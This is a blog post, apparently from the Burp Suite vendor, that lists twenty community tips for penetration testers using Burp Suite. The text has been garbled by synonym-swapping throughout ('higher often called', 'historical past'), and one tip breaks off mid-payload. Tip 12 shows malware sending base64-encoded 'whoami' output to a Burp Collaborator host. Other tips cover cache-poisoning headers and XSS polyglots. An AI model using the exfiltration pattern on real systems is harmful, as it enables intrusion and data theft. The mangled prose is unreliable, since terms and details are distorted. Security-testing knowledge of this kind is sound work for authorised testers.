The Burp Suite user community can simply be described as passionate, devoted, and extremely invested in the growth of our product. That’s why we find it irresistible when our customers take it upon themselves to query one another, and uncover new and thrilling methods to make Burp Suite work for them.
Long-time Burp Suite Professional user Michael Skelton, higher often called @codingo_, ran a fantastically informative Tweet thread asking customers for his or her finest tips and tips. We trawled the outcomes, and wished to share our favorites with you all.
Time saving tips
One of the biggest superpowers {that a} pentester, or any type of infosec skilled for that matter, can wield, is the potential to save lots of time. Automating guide processes, creating command repeats, and even simply producing default challenge choices – something that frees up your time to deep-dive the juicy stuff counts as a win in our e-book.
1. “When you’re taking part in with a parameter in the repeater tab and its worth will get mirrored in the response, you’ll be able to allow this toggle when you must scroll to see what has modified…a real time saver! @sw33tLie
2. “Build a default_project_options.json to keep away from repeat the similar config again and again. Like the regex on advance scope definition, timeouts, proxy or intercept config, match and exchange, historical past filter or ssl_pass_through. Just set a goal and begin searching instantly!” @Six2dez1
3. “From Proxy > HTTP Historical pastCtrl + R (Send the request to Repeater)Ctrl + Shift + R (Jump to Repeater)Ctrl + Space (Send the request from Repeater)It saves my mouse time :)Learnt by navigating “User choices > Misc > Hotkeys” @rashedul_css
4. “You can change default intruder Payload record. Set your customized one and will probably be a time saver.” @fuxksniper
5. “In search, tick “detrimental” matches to filter out all responses/requests that comprise strings that you don’t want to see – instance, “incap_sess”. This is a fast method apart from utilizing different methodology.” @yappare
Discovery methods
Naturally, you will have taken all of the time-saving strategies above on board, so you will be needing one thing to replenish all of that free time – proper? Lucky for you, the Burp Suite community is all arms on deck in the case of discovery. Advice on visitors filtering, publish listening, server abnormalities, script creation, collaborator polling, and far way more …
6. “shout out to @LaNMaSteR53 for exhibiting us this throughout his coaching tools/target/site-map/comparing @pirateducky
7. “When utilizing extensions is an excessive amount of, utilizing the previous evaluate sitemap to check for access control points && excluding logout/login/delete and so on from scope && (cookie jar when it solely use cookies || one other chained burp to interchange required tokens/csrf/header with one other user’s).” @irsdl
8. “Use Advance scope possibility to simply use the title of the web site/firm. that method I can filter our visitors + this additionally helps to see incase there’s S3 bucket or another cloud storage getting used beneath firm/area’s title!” @imhaxormad
9. “Starting a number of native proxy listeners on separate ports for numerous instruments. That method you’ll be able to filter your views by port and see precisely how the instruments act and what (undiscovered) abnormalities they may set off on the server.” @rauschecker
10. “Match & exchange FALSE2TRUE, most of the occasions it offers some fascinating behaviours :)” @sudhanshur705
11. “Save burp challenge to file and use gf patterns towards it for looking delicate stuff like keys,tokens,and so on. Kind of passive approach for Searching is js recordsdata for secrets and techniques.” @admiralgaust
12. “persistent entry to collaborator periods: https://onsecurity.io/weblog/persistent-access-to-burp-suite-sessions-step-by-step-guide/With the “SECRET_KEY”, you’ll be able to create scripts and ballot the collaborator and do no matter you need with the outcomes.E.g1.malware->base64(whoami).burpcollaborator.com2.Poll->get the requested subdomain->B64decode”@gweeperx
13. “I admit I take advantage of ‘copy as curl’ for non-pentesting functions … It’s tremendous useful so as to add as a POC for engineers to repair a bug after they don’t have burp.” @Blue_CanaryBE
14. “For me Match and Replace operate was a gem. I take advantage of it for a lot of functionalities ex: Adding Cache poisoning associated headers like X-Forwarded-Host: unique_stringAfter that i’ll search for the unique_string in Logger+ Responses whether it is reflecting anyplace” @0xlrfan
15. “add irrelevant-noisy hosts to ssl-passthrough record so the state will likely be smaller and you aren’t getting distract when seeking to the historical past tab Also you dont should ahead irrelevant requests/responses whereas intercepting. Especially in cell app testing” @Mustafaran
Productivity and workflow tips
Being accustomed to Burp Suite is one factor, however realizing lightning-fast shortcuts and rapid-fire methods to entry the data you want extra shortly? That’s one thing we’ll by no means tire of studying about. Our customers have lined every part from keyboard shortcuts to naming conventions right here, and it is all going to contribute to enhancing your workflows and getting outcomes sooner.
16. “This in all probability will not be a tip or a trick however I believe I learnt this from @InsiderPhD if I’m not unsuitable. It’s principally renaming the repeater tabs in repeater. I do that for every vital endpoint I go to and this works wonders when you have got so many tabs open.” @thebinarybot
17. “There are two earlier (<) & next (>) tabs on prime of repeater I did not know that I discovered from stok’s interview with nahamsec I suppose …. :)” @sidparmarr
18. “Always save a replica of the challenge file in the finish with the gadgets in the scope solely to scale back the challenge file measurement – then 7zip is the finest format to compress it closely.” @irsdl
19. “Match and exchange with XSS polyglots…add XSS1=”‘–>
20. “Sending requests to Burp on my native machine from my VPS by way of numerous instruments (which have a proxy possibility) utilizing the “ssh -R 18081:localhost:8081″ when logging on.I add a proxy listener for 127.0.0.1:8081 to Burp for this so I can simply filter between native machine and VPS visitors.” @xnl_h4ck3r
Anything we have missed?
Huge thanks exit to Michael Skelton for beginning this thread off, and naturally to all of the unbelievable members of the Burp Suite community for sharing their tips and tips. If you have got another recommendation to share, or any questions you need answered, be sure to publish them to our Twitter account utilizing the hashtag BurpSuiteTips. Happy Burping every person!
